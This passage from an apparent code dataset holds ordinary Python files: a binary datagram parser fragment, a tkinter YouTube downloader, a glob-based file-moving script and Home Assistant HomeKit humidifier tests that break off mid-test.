bytes_read\n\n if version == 0:\n\n if data[\"count\"] > 0:\n block_size = data[\"count\"] * 2\n indx = self.header_size(version)\n\n if int(data[\"mode\"]) & 0x1:\n data[\"power\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"int16\" # noqa\n )\n indx += block_size\n else:\n data[\"power\"] = None\n\n if int(data[\"mode\"]) & 0x2:\n data[\"angle\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"int8\" # noqa\n )\n data[\"angle\"] = data[\"angle\"].reshape((-1, 2))\n else:\n data[\"angle\"] = None\n\n else:\n data[\"power\"] = np.empty((0,), dtype=\"int16\")\n data[\"angle\"] = np.empty((0, 2), dtype=\"int8\")\n\n elif version == 3:\n\n # result = 1j*Data[...,1]; result += Data[...,0]\n\n # clean up the channel ID\n data[\"channel_id\"] = data[\"channel_id\"].strip(\"\\x00\")\n\n if data[\"count\"] > 0:\n\n # set the initial block size and indx value.\n block_size = data[\"count\"] * 2\n indx = self.header_size(version)\n\n if data[\"data_type\"] & 0b1:\n data[\"power\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"int16\" # noqa\n )\n indx += block_size\n else:\n data[\"power\"] = None\n\n if data[\"data_type\"] & 0b10:\n data[\"angle\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"int8\" # noqa\n )\n data[\"angle\"] = data[\"angle\"].reshape((-1, 2))\n indx += block_size\n else:\n data[\"angle\"] = None\n\n # determine the complex sample data type - this is contained in bits 2 and 3\n # of the datatype value. I'm assuming the types are exclusive...\n data[\"complex_dtype\"] = np.float16\n type_bytes = 2\n if data[\"data_type\"] & 0b1000:\n data[\"complex_dtype\"] = np.float32\n type_bytes = 8\n\n # determine the number of complex samples\n data[\"n_complex\"] = data[\"data_type\"] >> 8\n\n # unpack the complex samples\n if data[\"n_complex\"] > 0:\n # determine the block size\n block_size = data[\"count\"] * data[\"n_complex\"] * type_bytes\n\n data[\"complex\"] = np.frombuffer(\n raw_string[indx : indx + block_size], # noqa\n dtype=data[\"complex_dtype\"],\n )\n data[\"complex\"].dtype = np.complex64\n else:\n data[\"complex\"] = None\n\n else:\n data[\"power\"] = np.empty((0,), dtype=\"int16\")\n data[\"angle\"] = np.empty((0,), dtype=\"int8\")\n data[\"complex\"] = np.empty((0,), dtype=\"complex64\")\n data[\"n_complex\"] = 0\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n\n datagram_contents = []\n\n if version == 0:\n\n if data[\"count\"] > 0:\n if (int(data[\"mode\"]) & 0x1) and (\n len(data.get(\"power\", [])) != data[\"count\"]\n ):\n log.warning(\n \"Data 'count' = %d, but contains %d power samples. Ignoring power.\"\n )\n data[\"mode\"] &= ~(1 << 0)\n\n if (int(data[\"mode\"]) & 0x2) and (\n len(data.get(\"angle\", [])) != data[\"count\"]\n ):\n log.warning(\n \"Data 'count' = %d, but contains %d angle samples. Ignoring angle.\"\n )\n data[\"mode\"] &= ~(1 << 1)\n\n if data[\"mode\"] == 0:\n log.warning(\n \"Data 'count' = %d, but mode == 0. Setting count to 0\",\n data[\"count\"],\n )\n data[\"count\"] = 0\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"count\"] > 0:\n\n if int(data[\"mode\"]) & 0x1:\n datagram_fmt += \"%dh\" % (data[\"count\"])\n datagram_contents.extend(data[\"power\"])\n\n if int(data[\"mode\"]) & 0x2:\n datagram_fmt += \"%dH\" % (data[\"count\"])\n datagram_contents.extend(data[\"angle\"])\n\n return struct.pack(datagram_fmt, *datagram_contents)\n"} {"ext": "pyw", "sha": "1a301d4cdf3f0000f2f0525ab19727244bd43bae", "content": "import os\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\nfrom tkinter import PhotoImage\nfrom tkinter import messagebox\n\nimport pafy\nimport youtube_dl\n\n# if you get api limit exceeded error, get an api key and paste\n# here as a string value\n# pafy.set_api_key(key)\n\n# sample video url\n# https://www.youtube.com/watch?v=CjeYOtL6ORE\n\ncwd = os.getcwd()\n\nclass CustomEntry(tk.Entry):\n\tdef __init__(self, parent, *args, **kwargs):\n\t\ttk.Entry.__init__(self, parent, *args, **kwargs)\n\t\tself.parent = parent\n\t\tself.bind('', self.add_placeholder)\n\t\tself.bind('', self.clear_placeholder)\n\n\t\tself.configure(fg=\"gray70\")\n\t\tself.insert(0, 'Enter Video URL')\n\n\tdef add_placeholder(self, event=None):\n\t\tif not self.get():\n\t\t\tself.configure(fg=\"gray70\")\n\t\t\tself.insert(0, 'Enter Video URL')\n\n\tdef clear_placeholder(self, event):\n\t\tif event and self.get() == 'Enter Video URL':\n\t\t\tself.delete('0', 'end')\n\t\t\tself.configure(fg=\"black\")\n\n# Application Class -----------------------------------------------\n\nclass Application(tk.Frame):\n\tdef __init__(self, master=None):\n\t\tsuper().__init__(master=master)\n\t\tself.master = master\n\t\tself.master.focus_set()\n\t\tself.pack()\n\n\t\tself.url = ''\n\t\tself.video_quality = tk.StringVar()\n\t\tself.filesize = 0\n\n\t\tself.is_video_downloading = False\n\t\tself.is_audio_downloading = False\n\n\t\tself.draw_title_frame()\n\t\tself.draw_main_frame()\n\n\t\tself.bind('', self.search_video)\n\n\tdef draw_title_frame(self):\n\t\tself.title_frame = tk.Frame(self, bg='red', width=440, height=60)\n\t\tself.title_frame.grid(row=0, column=0, columnspan=5, pady=5)\n\t\tself.title_frame.grid_propagate(False)\n\t\tself.title = tk.Label(self.title_frame, text=' SaveFromYT - Youtube Audio/Video Downloader',\n\t\t\t\t\t\t\tfg='white', bg='red', font=('Times', 14),\n\t\t\t\t\t\t\twidth=450, height=50, image=youtube_icon, compound=tk.LEFT,\n\t\t\t\t\t\t\tanchor = 'w')\n\t\tself.title.grid(row=0, column=0, padx=5, ipadx=20)\n\n\tdef draw_main_frame(self):\n\t\tself.main_frame = tk.Frame(self, width=440, height=240, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.main_frame.grid(row=1, column=0, columnspan=5, pady=5, rowspan=3)\n\t\tself.main_frame.grid_propagate(False)\n\n\t\tself.entry = CustomEntry(self.main_frame, width=52)\n\t\tself.entry.grid(row=0, column=0, columnspan=3, pady=100, padx=(20,10))\n\t\tself.entry.bind('', self.search_video)\n\n\t\tself.search = tk.Button(self.main_frame, image=search_icon, \n\t\t\t\t\t\t\tfg='white', cursor='hand2', command=self.search_video,\n\t\t\t\t\t\t\trelief=tk.FLAT)\n\t\tself.search.grid(row=0, column=4, pady=100, padx=(30,10))\n\n\tdef draw_download_frame(self):\n\t\tself.main_frame.destroy()\n\n\t\tself.info_frame = tk.Frame(self, width=150, height=173, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.info_frame.grid(row=1, column=0, columnspan=2)\n\t\tself.info_frame.grid_propagate(False)\n\n\t\tself.video_frame = tk.Frame(self, width=290, height=173, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.video_frame.grid(row=1, column=2, columnspan=3)\n\t\tself.video_frame.grid_propagate(False)\n\n\t\tself.audio_frame = tk.Frame(self, width=370, height=67, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.audio_frame.grid(row=2, column=0, columnspan=4)\n\t\tself.audio_frame.grid_propagate(False)\n\n\t\tself.back_frame = tk.Frame(self, width=70, height=67, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.back_frame.grid(row=2, column=4)\n\t\tself.back_frame.grid_propagate(False)\n\n\tdef draw_download_widgets(self):\n\t\t# self.info_frame\n\n\t\tself.title = tk.Label(self.info_frame, width=20, height=3, bg='red',\n\t\t\t\t\twraplength=120, fg='white')\n\t\tself.title.grid(row=0, column=0, padx=1, pady=2)\n\n\t\tself.views = tk.Label(self.info_frame, width=20, height=2, bg='red',\n\t\t\t\t\tfg='white')\n\t\tself.views.grid(row=1, column=0, padx=1, pady=1)\n\n\t\tself.duration = tk.Label(self.info_frame, width=20, height=2, bg='red',\n\t\t\t\t\tfg='white')\n\t\tself.duration.grid(row=2, column=0, padx=1, pady=1)\n\n\t\tself.published = tk.Label(self.info_frame, width=20, height=2, bg='red',\n\t\t\t\t\tfg='white')\n\t\tself.published.grid(row=3, column=0, padx=1, pady=1)\n\n\t\t# self.video_frame\n\n\t\tself.video_quality.set(self.option_streams[0])\n\t\tself.options = tk.OptionMenu(self.video_frame, self.video_quality,\n\t\t\t\t\t\t*self.option_streams)\n\t\tself.options.config(bg='red', fg='white')\n\t\tself.options['menu'].config(bg='red', fg='white')\n\t\tself.options.grid(row=0, column=0, padx=50, pady=20, columnspan=5)\n\n\t\tself.video_dwn = tk.Button(self.video_frame, text='Download MP4',\n\t\t\t\t\t\t\tcommand=self.download_video, bg='red', fg='white',\n\t\t\t\t\t\t\twidth=15, cursor='hand2')\n\t\tself.video_dwn.grid(row=1, column=0, padx=50, pady=10, columnspan=5)\n\n\t\t# self.audio_frame\n\n\t\tself.audio_dwn = tk.Button(self.audio_frame, text='Download MP3',\n\t\t\t\t\t\t\tcommand=self.download_mp3, bg='red', fg='white',\n\t\t\t\t\t\t\twidth=15, cursor='hand2')\n\t\tself.audio_dwn.grid(row=0, column=0, padx=20, pady=20)\n\n\t\t# self.back_frame\n\t\tself.back = tk.Button(self.back_frame, text='back', image=back_icon,\n\t\t\t\t\t\t\tcommand=self.go_back, relief=tk.FLAT)\n\t\tself.back.grid(row=0, column=0, pady=10, padx=10)\n\n\tdef cease_buttons(self):\n\t\tif self.is_video_downloading:\n\t\t\tself.video_dwn['text'] = 'downloading'\n\t\tif self.is_audio_downloading:\n\t\t\tself.audio_dwn['text'] = 'downloading'\n\t\tself.video_dwn.config(state='disabled')\n\t\tself.audio_dwn.config(state='disabled')\n\n\tdef release_buttons(self):\n\t\tself.video_dwn.config(state='normal')\n\t\tself.audio_dwn.config(state='normal')\n\t\tif not self.is_video_downloading:\n\t\t\tself.video_dwn['text'] = 'Download MP4'\n\t\tif not self.is_audio_downloading:\n\t\t\tself.audio_dwn['text'] = 'Download MP3'\n\n\tdef search_video(self, event=None):\n\t\tself.url = self.entry.get()\n\t\tself.master.focus_set()\n\t\t\n\t\tif self.url and ' ' not in self.url:\n\t\t\ttry:\n\t\t\t\tvideo = pafy.new(self.url)\n\t\t\t\tself.video_title = video.title\n\t\t\t\tduration = video.duration\n\t\t\t\tviews = video.viewcount\n\t\t\t\tpublished = video.published\n\t\t\t\tthumbnail = video.thumb\n\t\t\t\tself.streams = video.streams\n\t\t\t\tself.option_streams = self.streams[::-1]\n\n\t\t\t\tself.draw_download_frame()\n\t\t\t\tself.draw_download_widgets()\n\n\t\t\t\tself.title['text'] = self.video_title[:50]\n\t\t\t\tself.views['text'] = f'Views : {views:,}'\n\t\t\t\tself.duration['text'] = f'Length : {duration}'\n\t\t\t\tself.published['text'] = f'Pub : {published[:10]}'\n\t\t\texcept OSError:\n\t\t\t\tmessagebox.showerror('SaveFromYT', 'Cannot extract data')\n\t\t\texcept ValueError:\n\t\t\t\tmessagebox.showerror('SaveFromYT', 'Invalid URL')\n\t\t\texcept:\n\t\t\t\tmessagebox.showerror('SaveFromYT', 'Cannot connect with internet')\n\n\tdef download_video(self):\n\t\tfiletypes = [('MP4', '.mp4')]\n\t\tfilepath = filedialog.asksaveasfilename(initialdir=cwd, \n\t\t\t\t\t\tinitialfile=self.video_title[:25]+'.mp4',\n\t\t\t\t\t\tfiletypes=filetypes)\n\t\tif filepath:\n\t\t\tself.is_video_downloading = True\n\t\t\tself.cease_buttons()\n\t\t\tvq = self.video_quality.get()\n\t\t\tl = len(self.streams)\n\t\t\topts = [str(stream) for stream in self.option_streams]\n\t\t\tstream = self.streams[opts.index(vq) - l + 1]\n\t\t\tself.filesize = stream.get_filesize()\n\n\t\t\tself.sizelabel = tk.Label(self.video_frame, bg='red', fg='white',\n\t\t\t\t\t\t\ttext=f'Filesize : {self.filesize/(1024*1024):.2f} Mb')\n\t\t\tself.sizelabel.grid(row=2, column=0, pady=5)\n\t\t\tself.pb = ttk.Progressbar(self.video_frame, orient=tk.HORIZONTAL, \n\t\t\t\t\t\t\tmode='determinate', length=100)\n\t\t\tself.pb.grid(row=2, column=2, columnspan=3, pady=5)\n\n\t\t\ttry:\n\t\t\t\tstream.download(quiet=True, callback=self.download_callback,\n\t\t\t\t\t\t\t\tfilepath=filepath)\n\t\t\t\tmessagebox.showinfo('SaveFromYT', 'Video Downloaded Successfully')\n\t\t\texcept:\n\t\t\t\tmessagebox.showerror('SaveFromYT', 'Cannot connect with internet')\n\t\t\t\n\t\t\tself.pb.destroy()\n\t\t\tself.sizelabel.destroy()\n\t\t\tself.is_video_downloading = False\n\t\t\tself.release_buttons()\n\t\t\t\n\n\tdef download_callback(self, total, recvd, ratio, rate, eta):\n\t\tperc = (recvd / total) * 100\n\t\tself.pb['value'] = int(perc)\n\t\tself.update()\n\n\tdef download_mp3(self):\n\t\tfiletypes = ['MP3', '.mp3']\n\t\tfilepath = filedialog.asksaveasfilename(initialdir=cwd, \n\t\t\t\t\t\tinitialfile=''.join(self.video_title[:25]+'.mp3'))\n\t\tif filepath:\n\t\t\tydl_opts = {\n\t\t\t\t'format': 'bestaudio/best',\n\t\t\t\t'outtmpl' : filepath,\n\t\t\t\t'postprocessors': [{\n\t\t\t\t\t'key': 'FFmpegExtractAudio',\n\t\t\t\t\t'preferredcodec': 'mp3',\n\t\t\t\t\t'preferredquality': '192'\n\t\t\t\t}],\n\t\t\t\t'postprocessor_args': [\n\t\t\t\t\t'-ar', '16000'\n\t\t\t\t],\n\t\t\t\t'prefer_ffmpeg': True,\n\t\t\t\t'keepvideo': True,\n\t\t\t\t'progress_hooks': [self.download_hook]\n\t\t\t}\n\n\t\t\tself.is_audio_downloading = True\n\t\t\tself.cease_buttons()\n\n\t\t\ttry:\n\t\t\t\tself.pb = ttk.Progressbar(self.audio_frame, orient=tk.HORIZONTAL, \n\t\t\t\t\t\t\tmode='determinate', length=100)\n\t\t\t\tself.pb.grid(row=0, column=2, pady=20, padx=20)\n\n\t\t\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t\t\t\tydl.download([self.url])\n\n\t\t\t\tfor file in os.listdir():\n\t\t\t\t\tif file.endswith('.webm'):\n\t\t\t\t\t\tos.remove(file)\n\n\t\t\t\tself.pb.destroy()\n\t\t\t\tmessagebox.showinfo('SaveFromYT', 'Successfully Downloaded Mp3')\n\t\t\texcept:\n\t\t\t\tmessagebox.showinfo('SaveFromYT', \"Can't connect with internet\")\n\n\t\t\tself.is_audio_downloading = False\n\t\t\tself.release_buttons()\n\n\tdef download_hook(self, d):\n\t\tif d['status'] == 'downloading':\n\t\t\tp = d['_percent_str']\n\t\t\tp = float(p.replace('%','').replace(' ',''))\n\t\t\tself.pb['value'] = round(p)\n\t\t\tself.update()\n\n\tdef go_back(self):\n\t\tself.info_frame.destroy()\n\t\tself.video_frame.destroy()\n\t\tself.audio_frame.destroy()\n\t\tself.back_frame.destroy()\n\n\t\tself.draw_main_frame()\n\nif __name__ == '__main__':\n\troot = tk.Tk()\n\troot.geometry('450x320')\n\troot.title('SaveFromYT')\n\troot.resizable(0,0)\n\n\tyoutube_icon = PhotoImage(file='icons/youtube.png')\n\tback_icon = PhotoImage(file='icons/back.png')\n\tsearch_icon = PhotoImage(file='icons/search.png')\n\n\tapp = Application(master=root)\n\tapp.mainloop()"} {"ext": "py", "sha": "1a301db2a25fe29e7e0a916e2b7cd125cbe4262e", "content": "#!/usr/bin/env python\nimport glob\nimport os\nimport sys\nimport time\nimport re\nimport shutil\nfrom os.path import expanduser\nhome = expanduser(\"~\")\nrosey_dir = home + \"/.rosey/\"\nrosey_config = rosey_dir + \"config\"\nrosey_log = rosey_dir + \"rosey.log\"\n\nclass Rosey():\n\n def __init__(self, config):\n \"\"\"Configs come one in a list of three member lists\"\"\"\n \"\"\"glob-file-pattern-to-match, prefix to remove, directory-to-move-matched-files\"\"\"\n self.config = config\n\n def FileMoveToDoList(self):\n files = []\n todos = []\n configs = iter(self.config)\n for config in configs:\n files = self.findMatchingFiles(config[0])\n for f in files:\n todos += [\n [f, self.replacePatternWithNewPath(f, config[1], config[2])]\n ]\n\n return todos\n\n def replacePatternWithNewPath(self, file, remove_this, dest_path):\n t = time.localtime(os.path.getctime(file))\n timestamp = time.strftime(\"%Y-%m-%d\", t) + \"-\"\n orig_name = os.path.basename(file)\n trimmed_name = orig_name.replace(remove_this, \"\")\n no_spaces_name = trimmed_name.replace(\" \", \"-\")\n timestamped_name = timestamp + no_spaces_name\n new_name = re.sub(\"-+\", \"-\", timestamped_name)\n new_path = dest_path + new_name\n return new_path\n\n def findMatchingFiles(self, glob_spec):\n all = glob.glob(glob_spec)\n return all\n\n\ndef check_config(config):\n findings = []\n regexes = [f[0] for f in config]\n if (regexes.sort() != list(set(regexes)).sort()):\n findings += \"You have one or more duplicate patterns\"\n return\n\n dest_dirs = [f[2] for f in config]\n for dest in dest_dirs:\n if (not os.path.isdir(dest)):\n findings += \"Destination directory does not exist: '{0}'\".format(dest)\n\n return findings\n\ndef cleanup_config(config):\n config_list = [line.rstrip().split(',') for line in config]\n trimmed_config = []\n for config_item in config_list:\n trimmed_config += [[f.lstrip().rstrip() for f in config_item]]\n\n return trimmed_config\n\ndef moveEm(todo, really_move = True):\n\n with open(rosey_log, \"a\") as myfile:\n for t in todo:\n message = \"Moving: {0}\\n to: {1}\\n\".format(t[0], t[1])\n\n if really_move:\n try:\n shutil.move(t[0], t[1])\n message += \" : Move Successful\"\n except Exception as e:\n message += \" : Move Fails {0}.\".format(e)\n\n myfile.write(message + \"\\n\");\n print message\n\ndef show_findings(findings):\n for f in findings:\n print f\n\ndef main(arg):\n\n if (not os.path.exists(rosey_config)):\n print \"You need to create ~/.rosey/config\"\n exit(1)\n\n with open(rosey_config) as f:\n config = f.readlines()\n\n clean_config = cleanup_config(config)\n findings = check_config(clean_config)\n if findings != []:\n show_findings(findings)\n exit(1)\n rosey = Rosey(clean_config)\n todo = rosey.FileMoveToDoList()\n if arg == \"move\":\n moveEm(todo)\n if arg == \"show\":\n moveEm(todo, False)\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print \"usage: {0} [move, show] {1}\".format(sys.argv[0], len(sys.argv))\n exit(0)\n main(sys.argv[1]) # Run the example\n\n"} {"ext": "py", "sha": "1a301e340b3e8aa8123ecd2dee29023be07ec43e", "content": "\"\"\"Test different accessory types: HumidifierDehumidifier.\"\"\"\nfrom pyhap.const import (\n CATEGORY_HUMIDIFIER,\n HAP_REPR_AID,\n HAP_REPR_CHARS,\n HAP_REPR_IID,\n HAP_REPR_VALUE,\n)\n\nfrom homeassistant.components.homekit.const import (\n ATTR_VALUE,\n CONF_LINKED_HUMIDITY_SENSOR,\n PROP_MAX_VALUE,\n PROP_MIN_STEP,\n PROP_MIN_VALUE,\n PROP_VALID_VALUES,\n)\nfrom homeassistant.components.homekit.type_humidifiers import HumidifierDehumidifier\nfrom homeassistant.components.humidifier.const import (\n ATTR_HUMIDITY,\n ATTR_MAX_HUMIDITY,\n ATTR_MIN_HUMIDITY,\n DEFAULT_MAX_HUMIDITY,\n DEFAULT_MIN_HUMIDITY,\n DEVICE_CLASS_DEHUMIDIFIER,\n DEVICE_CLASS_HUMIDIFIER,\n DOMAIN,\n SERVICE_SET_HUMIDITY,\n)\nfrom homeassistant.const import (\n ATTR_DEVICE_CLASS,\n ATTR_ENTITY_ID,\n ATTR_UNIT_OF_MEASUREMENT,\n DEVICE_CLASS_HUMIDITY,\n PERCENTAGE,\n SERVICE_TURN_OFF,\n SERVICE_TURN_ON,\n STATE_OFF,\n STATE_ON,\n STATE_UNAVAILABLE,\n)\n\nfrom tests.common import async_mock_service\n\n\nasync def test_humidifier(hass, hk_driver, events):\n \"\"\"Test if humidifier accessory and HA are updated accordingly.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(entity_id, STATE_OFF)\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.aid == 1\n assert acc.category == CATEGORY_HUMIDIFIER\n\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_current_humidity.value == 0\n assert acc.char_target_humidity.value == 45.0\n assert acc.char_active.value == 0\n\n assert acc.char_target_humidity.properties[PROP_MAX_VALUE] == DEFAULT_MAX_HUMIDITY\n assert acc.char_target_humidity.properties[PROP_MIN_VALUE] == DEFAULT_MIN_HUMIDITY\n assert acc.char_target_humidity.properties[PROP_MIN_STEP] == 1.0\n assert acc.char_target_humidifier_dehumidifier.properties[PROP_VALID_VALUES] == {\n \"Humidifier\": 1\n }\n\n hass.states.async_set(\n entity_id,\n STATE_ON,\n {ATTR_HUMIDITY: 47},\n )\n await hass.async_block_till_done()\n assert acc.char_target_humidity.value == 47.0\n assert acc.char_current_humidifier_dehumidifier.value == 2\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_active.value == 1\n\n hass.states.async_set(\n entity_id,\n STATE_OFF,\n {ATTR_HUMIDITY: 42, ATTR_DEVICE_CLASS: DEVICE_CLASS_HUMIDIFIER},\n )\n await hass.async_block_till_done()\n assert acc.char_target_humidity.value == 42.0\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_active.value == 0\n\n # Set from HomeKit\n call_set_humidity = async_mock_service(hass, DOMAIN, SERVICE_SET_HUMIDITY)\n\n char_target_humidity_iid = acc.char_target_humidity.to_HAP()[HAP_REPR_IID]\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_target_humidity_iid,\n HAP_REPR_VALUE: 39.0,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert len(call_set_humidity) == 1\n assert call_set_humidity[0].data[ATTR_ENTITY_ID] == entity_id\n assert call_set_humidity[0].data[ATTR_HUMIDITY] == 39.0\n assert acc.char_target_humidity.value == 39.0\n assert len(events) == 1\n assert events[-1].data[ATTR_VALUE] == \"RelativeHumidityHumidifierThreshold to 39.0%\"\n\n\nasync def test_dehumidifier(hass, hk_driver, events):\n \"\"\"Test if dehumidifier accessory and HA are updated accordingly.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(\n entity_id, STATE_OFF, {ATTR_DEVICE_CLASS: DEVICE_CLASS_DEHUMIDIFIER}\n )\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.aid == 1\n assert acc.category == CATEGORY_HUMIDIFIER\n\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 2\n assert acc.char_current_humidity.value == 0\n assert acc.char_target_humidity.value == 45.0\n assert acc.char_active.value == 0\n\n assert acc.char_target_humidity.properties[PROP_MAX_VALUE] == DEFAULT_MAX_HUMIDITY\n assert acc.char_target_humidity.properties[PROP_MIN_VALUE] == DEFAULT_MIN_HUMIDITY\n assert acc.char_target_humidity.properties[PROP_MIN_STEP] == 1.0\n assert acc.char_target_humidifier_dehumidifier.properties[PROP_VALID_VALUES] == {\n \"Dehumidifier\": 2\n }\n\n hass.states.async_set(\n entity_id,\n STATE_ON,\n {ATTR_HUMIDITY: 30},\n )\n await hass.async_block_till_done()\n assert acc.char_target_humidity.value == 30.0\n assert acc.char_current_humidifier_dehumidifier.value == 3\n assert acc.char_target_humidifier_dehumidifier.value == 2\n assert acc.char_active.value == 1\n\n hass.states.async_set(\n entity_id,\n STATE_OFF,\n {ATTR_HUMIDITY: 42},\n )\n await hass.async_block_till_done()\n assert acc.char_target_humidity.value == 42.0\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 2\n assert acc.char_active.value == 0\n\n # Set from HomeKit\n call_set_humidity = async_mock_service(hass, DOMAIN, SERVICE_SET_HUMIDITY)\n\n char_target_humidity_iid = acc.char_target_humidity.to_HAP()[HAP_REPR_IID]\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_target_humidity_iid,\n HAP_REPR_VALUE: 39.0,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert len(call_set_humidity) == 1\n assert call_set_humidity[0].data[ATTR_ENTITY_ID] == entity_id\n assert call_set_humidity[0].data[ATTR_HUMIDITY] == 39.0\n assert acc.char_target_humidity.value == 39.0\n assert len(events) == 1\n assert (\n events[-1].data[ATTR_VALUE] == \"RelativeHumidityDehumidifierThreshold to 39.0%\"\n )\n\n\nasync def test_hygrostat_power_state(hass, hk_driver, events):\n \"\"\"Test if accessory and HA are updated accordingly.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(\n entity_id,\n STATE_ON,\n {ATTR_HUMIDITY: 43},\n )\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_current_humidifier_dehumidifier.value == 2\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_active.value == 1\n\n hass.states.async_set(\n entity_id,\n STATE_OFF,\n {ATTR_HUMIDITY: 43},\n )\n await hass.async_block_till_done()\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_active.value == 0\n\n # Set from HomeKit\n call_turn_on = async_mock_service(hass, DOMAIN, SERVICE_TURN_ON)\n\n char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_active_iid,\n HAP_REPR_VALUE: 1,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert len(call_turn_on) == 1\n assert call_turn_on[0].data[ATTR_ENTITY_ID] == entity_id\n assert acc.char_active.value == 1\n assert len(events) == 1\n assert events[-1].data[ATTR_VALUE] == \"Active to 1\"\n\n call_turn_off = async_mock_service(hass, DOMAIN, SERVICE_TURN_OFF)\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_active_iid,\n HAP_REPR_VALUE: 0,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert len(call_turn_off) == 1\n assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id\n assert acc.char_active.value == 0\n assert len(events) == 2\n assert events[-1].data[ATTR_VALUE] == \"Active to 0\"\n\n\nasync def test_hygrostat_get_humidity_range(hass, hk_driver):\n \"\"\"Test if humidity range is evaluated correctly.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(\n entity_id, STATE_OFF, {ATTR_MIN_HUMIDITY: 40, ATTR_MAX_HUMIDITY: 45}\n )\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_target_humidity.properties[PROP_MAX_VALUE] == 45\n assert acc.char_target_humidity.properties[PROP_MIN_VALUE] == 40\n\n\nasync def test_humidifier_with_linked_humidity_sensor(hass, hk_driver):\n \"\"\"Test a humidifier with a linked humidity sensor can update.\"\"\"\n humidity_sensor_entity_id = \"sensor.bedroom_humidity\"\n\n hass.states.async_set(\n humidity_sensor_entity_id,\n \"42.0\",\n {\n ATTR_DEVICE_CLASS: DEVICE_CLASS_HUMIDITY,\n ATTR_UNIT_OF_MEASUREMENT: PERCENTAGE,\n },\n )\n await hass.async_block_till_done()\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(entity_id, STATE_OFF)\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass,\n hk_driver,\n \"HumidifierDehumidifier\",\n entity_id,\n 1,\n {CONF_LINKED_HUMIDITY_SENSOR: humidity_sensor_entity_id},\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 42.0\n\n hass.states.async_set(\n humidity_sensor_entity_id,\n \"43.0\",\n {\n ATTR_DEVICE_CLASS: DEVICE_CLASS_HUMIDITY,\n ATTR_UNIT_OF_MEASUREMENT: PERCENTAGE,\n },\n )\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 43.0\n\n hass.states.async_set(\n humidity_sensor_entity_id,\n STATE_UNAVAILABLE,\n {\n ATTR_DEVICE_CLASS: DEVICE_CLASS_HUMIDITY,\n ATTR_UNIT_OF_MEASUREMENT: PERCENTAGE,\n },\n )\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 43.0\n\n hass.states.async_remove(humidity_sensor_entity_id)\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 43.0\n\n\nasync def test_humidifier_with_a_missing_linked_humidity_sensor(hass, hk_driver):\n \"\"\"Test a humidifier with a configured linked motion sensor that is missing.\"\"\"\n humidity_sensor_entity_id = \"sensor.bedroom_humidity\"\n entity_id = 